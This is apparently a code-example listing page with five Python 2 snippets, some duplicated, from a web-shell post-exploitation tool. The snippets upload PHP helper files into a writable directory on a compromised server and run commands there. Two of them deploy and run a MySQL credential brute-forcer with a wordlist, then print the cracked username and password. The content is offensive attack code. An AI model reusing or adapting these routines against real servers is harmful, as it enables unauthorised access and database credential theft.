Esempio n. 1
0
 def upload(self, command):
     if len(command) != 3:
         cprint('\n[!] Usage: @upload [local_file_path] [remote_file_path]', 'red')
     else:
         lfile_path = command[1]
         rfile_path = command[2]
         file_handler.upload_file(lfile_path, rfile_path)
Esempio n. 2
0
    def __init__(self, username, password):
        cprint("\n[+] Please type 'exit' when your done to remove the files uploaded on the server")
        self.username = username
        self.password = password
        self.hostDir = linux.get_writble_dir()
        if not self.hostDir:
            cprint("'\n[+] Unable to locate a writeble directory on the server")
            cprint("\n[+]MySQL module can't be used. Exiting now!")
        else:
            self.phpFile = [self.hostDir + "/mysql.php", self.hostDir + "/auth.php"]
            cprint('\n[+] Uploading PHP files...', 'green')
            for i in self.phpFile:
                file_handler.upload_file('modules/services/{0}'.format(i.split('/')[-1]), i)

            cmd = 'echo "%s,%s" > %s/auth.txt' % (self.username, self.password, self.hostDir)
            cprint('\n[+] Authenticating with the server...', 'blue')
            make_request.get_page_source(cmd)

            cmd = "cd {0}; php {1}".format(self.hostDir, 'auth.php')
            res = make_request.get_page_source(cmd)
            if 'failure' in res:
                cprint("\n[+]Access denied for user '{0}'@'localhost'".format(self.username), 'red')
                self.authorized = False
            else:
                cprint("\n[+]Login Successful", 'green')
                self.authorized = True
Esempio n. 3
0
 def upload(self, command):
     if len(command) != 3:
         cprint('\n[!] Usage: @upload [local_file_path] [remote_file_path]',
                'red')
     else:
         lfile_path = command[1]
         rfile_path = command[2]
         file_handler.upload_file(lfile_path, rfile_path)
Esempio n. 4
0
    def mysql(self):
        folder = linux.get_writble_dir()
        if folder:
            self.bruter_file = folder + "/mysql.php"
            self.wordlist = folder + "/wordlist.txt"
            cprint("\n[+] Uploading the bruter/wordlist ...", "green")
            file_handler.upload_file("modules/bruters/mysql_bruter.php", self.bruter_file)
            file_handler.upload_file("modules/bruters/wordlist.txt", self.wordlist)
            cmd = "cd {0}; php {1}".format(folder, self.bruter_file)
            cprint("\n[+] Brute-Forcing MySql Creds ...", "green")
            creds = make_request.get_page_source(cmd)
            creds = "".join(creds).split(":")
            if creds[0] == "success":
                username = colored(creds[1], "blue")
                password = colored(creds[2], "blue")
                print "[+] MySql Creds Username: {0} Password: {1}".format(username, password)
            else:
                cprint("[!] Couldn't brute-force MySql credentials", "red")

            self.clean()
Esempio n. 5
0
    def mysql(self):
        folder = linux.get_writble_dir()
        if folder:
            self.bruter_file = folder + '/mysql.php'
            self.wordlist = folder + '/wordlist.txt'
            cprint('\n[+] Uploading the bruter/wordlist ...', 'green')
            file_handler.upload_file('modules/bruters/mysql_bruter.php',
                                     self.bruter_file)
            file_handler.upload_file('modules/bruters/wordlist.txt',
                                     self.wordlist)
            cmd = 'cd {0}; php {1}'.format(folder, self.bruter_file)
            cprint('\n[+] Brute-Forcing MySql Creds ...', 'green')
            creds = make_request.get_page_source(cmd)
            creds = ''.join(creds).split(':')
            if creds[0] == 'success':
                username = colored(creds[1], 'blue')
                password = colored(creds[2], 'blue')
                print '[+] MySql Creds Username: {0} Password: {1}'.format(
                    username, password)
            else:
                cprint('[!] Couldn\'t brute-force MySql credentials', 'red')

            self.clean()